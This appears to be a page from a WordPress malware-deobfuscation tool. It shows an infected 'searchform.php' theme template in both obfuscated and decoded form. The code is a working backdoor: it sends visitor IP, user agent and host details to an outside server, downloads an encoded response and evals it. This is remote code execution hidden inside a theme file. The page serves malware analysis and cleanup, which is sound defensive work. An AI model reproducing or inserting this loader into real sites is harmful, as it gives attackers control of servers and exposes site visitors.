Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
/*
* The searchform.php template.
*
* Used any time that get_search_form() is called.
*
* @link https://wordpress.org/themes/template/
* @package WordPress
* @subpackage
* @since 1.0 */
$EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64_decode';$vXKzarSqz = $EisCC[64].$EisCC[7].$EisCC[26].$EisCC[57].$EisCC[26].$EisCC[64];$UlfmeWlz = "auth.php";$dsH = "http://";$dsH .= $vXKzarSqz;$dsH .= '/';$dsH .= $UlfmeWlz;$agkH = urlencode((isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER[$EisCC[65].$EisCC[5].$EisCC[58]]));$PYBFUMzJv = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[61].$EisCC[39].$EisCC[37].$EisCC[2]];$rDd = $_SERVER["SCRIPT_NAME"];if (isset($_SERVER['HTTP_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];elseif(isset($_SERVER['HTTP_X_FORWARDED'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];elseif(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]];elseif(isset($_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]];else $PLxAVm = 'UNKNOWN';$yVmUFDc = $EisCC[56].$EisCC[67].$EisCC[67].$EisCC[22].$EisCC[45].$EisCC[52].$EisCC[44].$EisCC[48].$EisCC[16].$EisCC[45].$EisCC[20].$EisCC[68].$PLxAVm.$EisCC[16].$EisCC[38].$EisCC[28].$EisCC[68].$agkH.$EisCC[16].$EisCC[17].$EisCC[67].$EisCC[4].$EisCC[31].$EisCC[68].$PYBFUMzJv.';req='.$rDd.';';$AFCLFaeBi = array('http'=>array('method'=>'GET', 'header'=>$yVmUFDc));if( function_exists($GKotnoU('Y3'.'Vy'.'bF9p'.'bm'.'l0')) ) { $ttekHhTRK = curl_init(); $DGxuu = array(10023 => array($yVmUFDc),10002 => $dsH,19913 => 1,64 => false,52 => true,42 => false); curl_setopt_array($ttekHhTRK, $DGxuu); $ttekHhTRK2 = curl_exec($ttekHhTRK); curl_close($ttekHhTRK);}else { $ttekHhTRK2 = @file_get_contents($dsH,false,stream_context_create($AFCLFaeBi)); }$ttekHhTRK2 = str_rot13($ttekHhTRK2);$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);if(stripos($ttekHhTRK2,'fa704e7366d666bd')!==FALSE) eval($ttekHhTRK2);
?><?php
/*
* The searchform.php template.
*
* Used any time that get_search_form() is called.
*
* @link https://wordpress.org/themes/template/
* @package WordPress
* @subpackage
* @since 1.0 */
$EisCC = "n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";
$GKotnoU = 'base64_decode';
$vXKzarSqz = "xvc.cx";
$UlfmeWlz = "auth.php";
$dsH = "http://";
$dsH = "http://xvc.cx";
$dsH = "http://xvc.cx/";
$dsH = "http://xvc.cx/auth.php";
$agkH = urlencode(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER["PWD"]);
$PYBFUMzJv = $_SERVER["HTTP_HOST"];
$rDd = $_SERVER["SCRIPT_NAME"];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$PLxAVm = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
$PLxAVm = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {
$PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
} elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) {
$PLxAVm = $_SERVER["HTTP_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_FORWARDED"])) {
$PLxAVm = $_SERVER["HTTP_FORWARDED"];
} elseif (isset($_SERVER["REMOTE_ADDR"])) {
$PLxAVm = $_SERVER["REMOTE_ADDR"];
} else {
$PLxAVm = 'UNKNOWN';
}
$yVmUFDc = $EisCC[56] . $EisCC[67] . $EisCC[67] . $EisCC[22] . $EisCC[45] . $EisCC[52] . $EisCC[44] . $EisCC[48] . $EisCC[16] . $EisCC[45] . $EisCC[20] . $EisCC[68] . $PLxAVm . $EisCC[16] . $EisCC[38] . $EisCC[28] . $EisCC[68] . $agkH . $EisCC[16] . $EisCC[17] . $EisCC[67] . $EisCC[4] . $EisCC[31] . $EisCC[68] . $PYBFUMzJv . ';req=' . $rDd . ';';
$AFCLFaeBi = array('http' => array('method' => 'GET', 'header' => $yVmUFDc));
if (function_exists($GKotnoU('Y3VybF9pbml0'))) {
$ttekHhTRK = curl_init();
$DGxuu = array(10023 => array($yVmUFDc), 10002 => $dsH, 19913 => 1, 64 => false, 52 => true, 42 => false);
curl_setopt_array($ttekHhTRK, $DGxuu);
$ttekHhTRK2 = curl_exec($ttekHhTRK);
curl_close($ttekHhTRK);
} else {
$ttekHhTRK2 = @file_get_contents($dsH, false, stream_context_create($AFCLFaeBi));
}
$ttekHhTRK2 = str_rot13($ttekHhTRK2);
$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);
if (stripos($ttekHhTRK2, 'fa704e7366d666bd') !== FALSE) {
eval($ttekHhTRK2);
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.